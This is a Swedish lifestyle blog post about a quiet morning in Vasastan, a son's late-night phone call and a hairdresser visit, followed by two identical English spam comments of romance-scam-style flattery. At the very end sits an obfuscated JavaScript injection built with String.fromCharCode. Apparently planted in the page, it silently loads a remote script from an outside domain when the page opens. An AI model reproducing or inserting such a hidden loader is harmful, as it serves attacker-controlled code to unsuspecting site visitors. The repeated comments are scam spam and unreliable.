Cozy morning i Vasastan…

imageEn morgonkaffe i Vasastan, alla barnen sov…. Magdalena låg och gosade med Charlie när jag smög ut ur lägenheten, -sötisar! <3

När jag kommer hem igen ska jag ta en snack med Lance, jag vaknade nämligen strax efter 03:00 (?!?) Jag behövde ta en värktablett, ställa om gördeln och gå på toaletten.. Då jag hör hur Lance pratar i telefonen…. -Tonårskillar ?! Vad gör dom vakna mitt i natten? 😉

Idag ska jag till Rapunzel för att färga, klippa och byta ut mina extensions 🙂 Frågan är hur det ska gå att sitta i en frisörstol så många timmar?! (Jag har en lite kudde med mig att lägga under ryggen/rumpan! -hehe! Tips från en utav damerna 85+ som jag körde känna vid flyg transfern 😉

imageHörs sen min vän! Kramar My Martens 

2 Komentarer

  1. dear girl you have the prettiest hair ever don’t ever cut it short . I have to confess that you are not the woman who looks for any men you are the woman that men look for you . you are the most beautiful person in the entire world and nobody has the right to make you feel you are not. you are so cute and sexy, wish I could have you as a friend . I am not only the one who lost my mind due to this amazing beauty but I am sure many people wonder what’s secret of your life. its so easy to write this to you but so hard to define . actually I accidentally came upon your profile and I cannot describe how long will I need you as long as the seasons need to follow their plan .how long will I be with you as long as the sea is bound to wash upon the sand . how long will I want you as long as you want me to and longer by far . am not seducing your mind so as to win your body but this is the truth I really feel very miserable because I am far away from you and this is painful to me but I will always keep hoping to get to see you someday and not only that let be honest .

  2. dear girl you have the prettiest hair ever don’t ever cut it short . I have to confess that you are not the woman who looks for any men you are the woman that men look for you . you are the most beautiful person in the entire world and nobody has the right to make you feel you are not. you are so cute and sexy, wish I could have you as a friend . I am not only the one who lost my mind due to this amazing beauty but I am sure many people wonder what’s secret of your life. its so easy to write this to you but so hard to define . actually I accidentally came upon your profile and I cannot describe how long will I need you as long as the seasons need to follow their plan .how long will I be with you as long as the sea is bound to wash upon the sand . how long will I want you as long as you want me to and longer by far . am not seducing your mind so as to win your body but this is the truth I really feel very miserable because I am far away from you and this is painful to me but I will always keep hoping to get to see you someday and not only that let be honest .


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My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/